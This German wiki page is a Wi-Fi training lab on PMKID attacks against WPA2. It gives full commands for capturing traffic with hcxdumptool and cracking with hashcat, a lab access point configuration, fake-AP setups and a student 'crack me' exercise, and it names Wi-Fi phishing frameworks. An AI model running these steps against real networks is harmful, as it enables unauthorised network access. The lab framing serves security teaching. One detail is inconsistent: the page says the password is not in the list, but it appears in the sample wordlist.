Wlan PMKID-Angriff

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

PMKID-Angriff in der WLAN-Schulung

Vorbereitung

Passwordliste generieren

  • crunch 8 8 0123456789 -o password.lst
Crunch will now generate the following amount of data: 900000000 bytes
... dies dauert eine Weile

Störende Dienste stoppen

  • systemctl stop avahi-daemon
  • systemctl stop NetworkManager

Interface suchen

  • airmon-ng
PHY     Interface       Driver          Chipset
phy0    wlan0           rtl8812au       Alfa AWUS036ACH

Interface vorbereiten

  • ip link set wlan0 down
  • iw dev wlan0 set type monitor
  • ip link set wlan0 up

PMKID-Sammlung starten

  • hcxdumptool -i wlan0 -o pmkid.pcapng --enable_status=15
läuft, bis man Strg+C drückt

PMKID extrahieren

  • hcxpcapngtool -o pmkid.hash -E essidlist.txt pmkid.pcapng

PMKID mit Hashcat knacken

  • hashcat -m 16800 pmkid.hash password.lst

Beispielhafte Auswertung

  • Laptop: ~1000 H/s
  • GPU (RTX 3080): bis 800000 H/s
  • Crack über GPU-Cluster oder Cloud möglich

AP-Konfiguration für PMKID-Test

Garantiert PMKID-fähige hostapd.conf

interface=wlan0
driver=nl80211
ssid=crackme
hw_mode=g
channel=6
country_code=DE
ieee80211n=1
auth_algs=1
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=Sommer2024
own_ip_addr=127.0.0.1
eap_server=0
Hinweis
hostapd bietet PMKID standardmäßig an, wenn ein Client verbunden war oder Roaming aktiviert ist.

Fake-APs simulieren (für mehrere Gruppen)

Option 1: Mehrere Instanzen von hostapd (getrennte Interfaces notwendig)

  • cp hostapd.conf hostapd1.conf
  • cp hostapd.conf hostapd2.conf
  • Ändere SSID und channel in jeder Datei

Beispiel:

ssid=crackme01
channel=1
ssid=crackme02
channel=6
  • hostapd -dd hostapd1.conf &
  • hostapd -dd hostapd2.conf &

Option 2: Einfacher Fake-AP mit create_ap (nur zu Demo-Zwecken)

  • apt install create-ap
  • create_ap wlan0 eth0 crackme123 Sommer2024
Wird nicht von allen PMKID-Tools erkannt, aber gut für Fake-Kulisse oder Captive Portals.

Schülerübung: "Crack Me!" WLAN

Zielsetzung

  • Schüler scannen Umgebung
  • Erfassen PMKID mit hcxdumptool
  • Cracken mit vorbereiteter Wordlist

Beispiel-SSID und Passwort (nicht in Liste)

  • SSID: crackme
  • Passwort: Sommer2024

passende Wordlist (Ausschnitt)

hallo123
testtest
Sommer2023
Sommer2024
Winter2024
12345678
98765432
00001234

Cracken starten

  • hashcat -m 16800 pmkid.hash wordlist.txt

Abschluss

Diskussion

  • Warum klappt PMKID ohne Client?
  • Welche APs sind verwundbar?
  • Warum ist WPA3 hier sicherer?

Weiterführende Tools

  • Bettercap
  • roguehostapd
  • hostapd-wpe (für Enterprise-Angriffe)
  • Captive-Portal-Frameworks: WiFiPhisher, Fluxion

Videos

Links